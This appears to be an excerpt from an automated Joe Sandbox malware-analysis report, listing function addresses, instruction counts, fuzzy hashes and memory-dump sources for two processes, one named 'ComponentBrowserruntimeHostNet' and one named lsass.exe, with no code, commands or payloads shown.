Instruction ID: f16f21e74887b19a088ca7d5b92b78f5f6f40d877fadd6f6a1036fd09ccae13b
Opcode Fuzzy Hash: 5e8b64b3668c4fd948b335103ad9814d0baead3758870f88a2b441810ece77ee
Instruction Fuzzy Hash: AC411822B0C9590EE318F77CA4AA9F877C1EF5933AB1445BBE44ECB1D7DD14A841C284

Function 00007FFD9BAA0960 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a56677db1ca8f35d5f0db940f67885e8e8c58c9cbdc610d48ee542fcebc08be
Instruction ID: 3cb536d9bb471e65f8624faa052adf71fd4cacd8948e9e5107a84adbbde9300a
Opcode Fuzzy Hash: 6a56677db1ca8f35d5f0db940f67885e8e8c58c9cbdc610d48ee542fcebc08be
Instruction Fuzzy Hash: F931F521B1C9190FE368F76C646AAF973C2DF5832AF5045BBE40EC72E7DD18AC418294

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08e5b435923eb877a29c5650f43a3c3e760c18d010e4ae0bafee9ac366f348b
Instruction ID: 71e3ca8899a0fa06e5ad7c2763d892f7c6a163ed7144c2432b32a11a0977166a
Opcode Fuzzy Hash: e08e5b435923eb877a29c5650f43a3c3e760c18d010e4ae0bafee9ac366f348b
Instruction Fuzzy Hash: 26213421B1895D0FE79CF76C946EA7972C3EF98324F9004BAE40EC32E7DD54AC428291

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
Instruction ID: 5bc38230dc4480a22edf620031fe9e4d437d6a8782cfa65fedf0a04d9d863ead
Opcode Fuzzy Hash: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
Instruction Fuzzy Hash: 9B210736B0D64D8AE732ABA898510DC7B60EF81325F0545B3D04CCF1D3D968264AC7A5

Function 00007FFD9BAA3194 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
Instruction ID: f8459353b2f853158c0f66784987d2b5f305d3b060a9a6a12f596c5e13bf3b3f
Opcode Fuzzy Hash: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
Instruction Fuzzy Hash: 56119420F0A90E4FEBB4EB9888746B876E3EF58711F1142B6C40DD32B1DD68AE448B50

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
Instruction ID: e3ca8fa6d0921ed3253570a76162bdd21165d4e4faa083d7e74e2c3e33cd49aa
Opcode Fuzzy Hash: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
Instruction Fuzzy Hash: 0011C635B0E68D8FE731DFA8886519C7FB1EF42711F0645F7C088DB1A2D574164987A4

Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
Instruction ID: 360ea816e2c7504f28c4fdf7306e062410b670ba00d8739fdd3db69be8d41542
Opcode Fuzzy Hash: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
Instruction Fuzzy Hash: A0010435B0E38C8FE722DFA8886419CBFB1EF42710F0645F7C088CB1A2D97426498764

Function 00007FFD9BAA49B6 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e248a75c2e273f4603a18c1a9537183bac33b2f34bc6df16b895e85e6d6ea2
Instruction ID: a52fbe26b185d13e4d8e27cd550f7553d3d6c37aaf294614e4ff3da344bb538d
Opcode Fuzzy Hash: 21e248a75c2e273f4603a18c1a9537183bac33b2f34bc6df16b895e85e6d6ea2
Instruction Fuzzy Hash: C711B13190496C8FDBA8DB04C894B9D77B1EB58301F1585AED40EE72A0CA75AE85CB85

Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
Instruction ID: 0842613c28fa6246b685083414a53d6f204e5d264d6e372224b1afbf9384dd7f
Opcode Fuzzy Hash: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
Instruction Fuzzy Hash: B5019235A0E38D9FD721DFA4885419CBFB1EF42710F1641E7D088DB1A2D9746645C754

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
Instruction ID: 2b5f8539aa83c294907a52e2e8c51086a76859ff4927a3d2ed4f1cf29778dfe4
Opcode Fuzzy Hash: 1aedc15860473d66294bcd7d30928d416fab4d432e3251ec394bf809f57ce886
Instruction Fuzzy Hash: B701BC34A0E38D9FE721DBA488A419CBFB1AF02700F1541E7C088CB1A2D9782A448754

Function 00007FFD9BAA32CD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction ID: 0a2fa89e7e0d5747494ddef0842e7392d38e43ee3c4e0df416cc6856fdda74ef
Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
Instruction Fuzzy Hash: D7F0E630B0A91E8AEBB4DB54CC547B873A2EF54311F1141B6C40ED31B1DEB86EC58B54

Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
Instruction ID: 5a485b8274835d9c3335894b93f793446f39198f4132d1a56ab01eaaa1494254
Opcode Fuzzy Hash: 09bed51a84c8659b2e94871270fad55b8b9426c8566189d6f2baa9fe026836bc
Instruction Fuzzy Hash: 49F0553560DA4ACFDB40AB38ECA18D0BB60EB46208B5611EAC088C70A3E250195CC700

Function 00007FFD9BAA32A4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction ID: 94a44058782c04311fa8ec512bb0c1704cef5a4e1f9f533843700eb2b5e94c0a
Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
Instruction Fuzzy Hash: 55F05420B0A50E4AEBB4DB84C8A46B97393EF54311F114176C40ED71F2CE696E458A50

Function 00007FFD9BAA16B0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
Instruction ID: e6345f37c77d078c8dff598482f6ca69cc302ba28a0d1fc8aa3ae9b7608c4101
Opcode Fuzzy Hash: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
Instruction Fuzzy Hash: 68E09231B0851A8BF7299744C8B07B873A6EB94300F1641BCD94FD36F1DDB8AE018699

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction ID: 9a2e969648b5b8e455ef805bf44c71f79e16c2b759d97fefd7bf251fb2ed1667
Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
Instruction Fuzzy Hash: 65C00205F5B51E01E53573EA54660BDA2425BD5E54FD70172D50C800A198DD22D9026A

Function 00007FFD9BAA520E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3e7c0902c0bdd17eb81eaba75847c45b3ad70e399ecfffc7f22d09021e1c50
Instruction ID: eb3d624e4cc36ede64214407ee54c28e5e1c9dfbdf23bf80e027ab142760ea74
Opcode Fuzzy Hash: 9f3e7c0902c0bdd17eb81eaba75847c45b3ad70e399ecfffc7f22d09021e1c50
Instruction Fuzzy Hash: 26C08C01F0881A12F25E2308143263D08038F4461CFE58074E82EC63CECE0C1B0102C2

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction ID: 23c1ab6935c2875efbf1a70c7ea36ce8b5266d16010fde7bd8eb8d4906734a1f
Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
Instruction Fuzzy Hash: B0B01200D5740F00E43433FA089207970415B44200FC20070D40C8009198CD32D80367

Non-executed Functions

Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAA0B46
#{9, xrefs: 00007FFD9BAA0B3E
!k9, xrefs: 00007FFD9BAA0B4E
c9, xrefs: 00007FFD9BAA0B56

Memory Dump Source

Source File: 00000004.00000002.1768816812.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_ComponentBrowserruntimeHostNet.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
Instruction ID: b33f58bc7fd9925b00184f98466e5a05b79c2144674a0d83844a67e63aec78ad
Opcode Fuzzy Hash: f55fb42346b907c0464accb34b153e20408966f01eb438533c853ee5b221f10f
Instruction Fuzzy Hash: 4141CD17B0842745E239B3FD78219E95B408FA823FB0847B3F55E8D0C78C082486C2E9

Analysis Process: lsass.exePID: 1368, Parent PID: 1260COMMON

Executed Functions

Function 00007FFD9BA90D47 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

5\_H, xrefs: 00007FFD9BA90DF3

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID: 5\_H
API String ID: 0-3325266018
Opcode ID: 0e8d6b20cbdb0bd00163ae68cdad9b509578d468b3a7d343dc465d525992ff84
Instruction ID: 810952504fa6c7667de3a56bed5c1a09fafcdfc4efa245a4b7fc5f9781e992db
Opcode Fuzzy Hash: 0e8d6b20cbdb0bd00163ae68cdad9b509578d468b3a7d343dc465d525992ff84
Instruction Fuzzy Hash: 70910872A0DA8D8FE759DB688875BAABFE1FF59310F0501AED049D72E6DB781410CB00

Function 00007FFD9BE83D58 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BE83DD2

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: aef9e3fb6e94278347f8599cb3311bf425a0f41135aa1fd88f1862f51d72c59b
Instruction ID: d2063e097b44de2679b46df32e7751dfa298d6052fbaf73ea1859a189cd80bca
Opcode Fuzzy Hash: aef9e3fb6e94278347f8599cb3311bf425a0f41135aa1fd88f1862f51d72c59b
Instruction Fuzzy Hash: 5F518231E09A4E8FDB5ADB98C4615FDBBB1FF44304F1141BAE02AE72D2DA396901CB40

Function 00007FFD9BE917D9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BE917F6

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 78773f2e1a43873d24b22663fa03778f27ef70323f4acee6c5f82ca2f39c1fa3
Instruction ID: b2ef2b1b0e69b920456188e4e18509a1a1f21a4f1573df35f0c6ba27c9a1ceb8
Opcode Fuzzy Hash: 78773f2e1a43873d24b22663fa03778f27ef70323f4acee6c5f82ca2f39c1fa3
Instruction Fuzzy Hash: 7FF02B6190F3C04FCB1ADA3488288147FA0EF2320074A42EFC086CF1E3DA1CC889C711

Function 00007FFD9BE90FF9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BE91016

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 3fe98cea3e04a69ef9578f4526b9adb7e6a66e3c4c999b7b216b62d21fc39ece
Instruction ID: 30905013eb9b36e78f851c5b1cc9ec0c2f1b782498965dcfa99b30c8c72082f5
Opcode Fuzzy Hash: 3fe98cea3e04a69ef9578f4526b9adb7e6a66e3c4c999b7b216b62d21fc39ece
Instruction Fuzzy Hash: 9BE01AA154F7C44FDB1AEB74887A8447FA1AE6731178B41EEC186CF1B3E62E9849C701

Function 00007FFD9BE91A19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BE91A36

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 9092bbf3b6dccb8af45a484cf68103aab07fabbd82cb591250be62ed4457c616
Instruction ID: eaaebd97cac740c19e07075110cf3e1e2e00b795fccac820f5c25bd81faa2f6e
Opcode Fuzzy Hash: 9092bbf3b6dccb8af45a484cf68103aab07fabbd82cb591250be62ed4457c616
Instruction Fuzzy Hash: A2E0E56154E7D44FCB1AEA7488699487FA0AE6721078A40EEC186CB1B3E62A9849C702

Function 00007FFD9BBF1DBA Relevance: .7, Instructions: 747COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1908585632.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bbf0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e008f0c86f70b0a67dbb79c1350439475bab62a58a33d32cf076998dcd22e421
Instruction ID: 57e355bbe2c6115d616eafb2731ef54fc0666e239c9adb070512e2b190bff2e6
Opcode Fuzzy Hash: e008f0c86f70b0a67dbb79c1350439475bab62a58a33d32cf076998dcd22e421
Instruction Fuzzy Hash: FF528D71E1DA598FDBA8EB58C8A1EA4B7E1FF6C354F0401E9A04DD32D2CA757980CB41

Function 00007FFD9BE83FCF Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e2b79797bd04ed9e6c459e888a1c41be8f309d7fc263e6067216700982cbc0
Instruction ID: 8e1d2e13b87a93ac38504346406e5e629947408b3a577a902a27f4486e8e96eb
Opcode Fuzzy Hash: 41e2b79797bd04ed9e6c459e888a1c41be8f309d7fc263e6067216700982cbc0
Instruction Fuzzy Hash: FAF1E030A19E598FEB58CF58C4E06B53BB1FF44301B5141BDC85ECB69ADA39E981CB81

Function 00007FFD9BE85037 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3ba4dc8477824f70badcfe959aad5324ac4cc6825277346791f6a24e995db7
Instruction ID: b5d6bb1038ea489039d34c0614c810cdbf083441cd14eac4a5b3151e8fcf777f
Opcode Fuzzy Hash: 0c3ba4dc8477824f70badcfe959aad5324ac4cc6825277346791f6a24e995db7
Instruction Fuzzy Hash: B5D11330A0EF4A8FE379CB68D4A157577F1FF44300B1105BEC4AA876A6DE3AB9428741

Function 00007FFD9BA91171 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e1092fc584efe38c14995b16471745988859047ee08abf18296060ffe54813
Instruction ID: 8c8e89a93db228efb5cd509bd22c4a72409777ad381f6ef50e3529fbe0f68cb1
Opcode Fuzzy Hash: a7e1092fc584efe38c14995b16471745988859047ee08abf18296060ffe54813
Instruction Fuzzy Hash: D8B11731A0964D8FEB58EF68C855AE97BE0FF59310F1542BFD44EC72A2DA74A441CB40

Function 00007FFD9BE83FEF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeedf75175c85e67c2be81922713080b417612bf69910a8fce17a4809a2b14b6
Instruction ID: 97b858f5b87b6599e82a2d25f4e580482726b8fe9b1b3665d895935d689955f8
Opcode Fuzzy Hash: aeedf75175c85e67c2be81922713080b417612bf69910a8fce17a4809a2b14b6
Instruction Fuzzy Hash: 55C1DE3061AE5A8FEB19CF58C0E05B13BB1FF44301B5145BDC89A8B69BDA39E981CB41

Function 00007FFD9BE83882 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f17f5fa815a9a831c677f9f673cdd54f1096e3c63caefc29ed1c71dd04a3386
Instruction ID: c1d14eedff9b97ac43d020a3d76a7895702adede20f72fb586fdbafccd323b24
Opcode Fuzzy Hash: 4f17f5fa815a9a831c677f9f673cdd54f1096e3c63caefc29ed1c71dd04a3386
Instruction Fuzzy Hash: 5EB1F77070AE4A4FE35ADB68C0A16B4B7A5FF48300F4541B9E05EC7AA7CB39B951C780

Function 00007FFD9BE81247 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f490c4d17bf0554b413f57799e75df38f51164155f093e06f5a53094f4ee16ad
Instruction ID: 88bf4031e5a9c877177d090d02e4259f46381f7d26c847f5f3e1812f7e61e809
Opcode Fuzzy Hash: f490c4d17bf0554b413f57799e75df38f51164155f093e06f5a53094f4ee16ad
Instruction Fuzzy Hash: 8F21FC12F0FE9B8AF77456E824710F866586F59334F1A0277D4BD890E3DC2E2A455383

Function 00007FFD9BE82DB6 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070783fe2397cfe19b269e78cface614bf8c5eccca103a237e85a2b051e1bad3
Instruction ID: 0cc78407bba24b5227707044e1c6cbe88d848a3422b17e7ea7e5e2f4b2ace84f
Opcode Fuzzy Hash: 070783fe2397cfe19b269e78cface614bf8c5eccca103a237e85a2b051e1bad3
Instruction Fuzzy Hash: 8B816931B0EE494FE33A8BE894215797BE4EF45310B16057ED4AFC31A3DA3AB5028745

Function 00007FFD9BE80EF9 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4710cce34ed23134c25ba43fd8315856cc945090884964d97f8a86179dbafbe8
Instruction ID: 4e209ad216e5e86749507fd379d2c729f1dbaa0b0c170c691f783ed013238f3a
Opcode Fuzzy Hash: 4710cce34ed23134c25ba43fd8315856cc945090884964d97f8a86179dbafbe8
Instruction Fuzzy Hash: 56713B31B0ED8D4FE778DA5888669B537C4EF48310B150279D06EC7573DE39AE068382

Function 00007FFD9BE81ABB Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c19920367e65d237aaca5ec9f7bef2098ea5ec6427c6f28fcb019fbff0c2fc0e
Instruction ID: 2a897571ab7aaa49dc4ee3b7c0803f946a6d64eebc0c60bfc63380da1424a3c7
Opcode Fuzzy Hash: c19920367e65d237aaca5ec9f7bef2098ea5ec6427c6f28fcb019fbff0c2fc0e
Instruction Fuzzy Hash: D371A530E1ED4E8FE779DBA488646BC7BA4EF49300F1505B9D02ED71A6EE396941C702

Function 00007FFD9BE8E597 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc08f1df6feadbfbb7558390cd4584fd1b261418228b53d70cd81170287d8b1
Instruction ID: 69c146bc887c9b78135d533fe5c5f406a5a8c0b5fe755b2d4a72e697242bb575
Opcode Fuzzy Hash: 4bc08f1df6feadbfbb7558390cd4584fd1b261418228b53d70cd81170287d8b1
Instruction Fuzzy Hash: CF516E21B19D1D4FE6A8FB6888AAAB973D2FF9C310F4501B9E41EC32E2DD356D418741

Function 00007FFD9BA908D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cc725e76f599b8ecf1cd44ca0b39655fbb9e86d20c028c1a75bc04759e0c0c
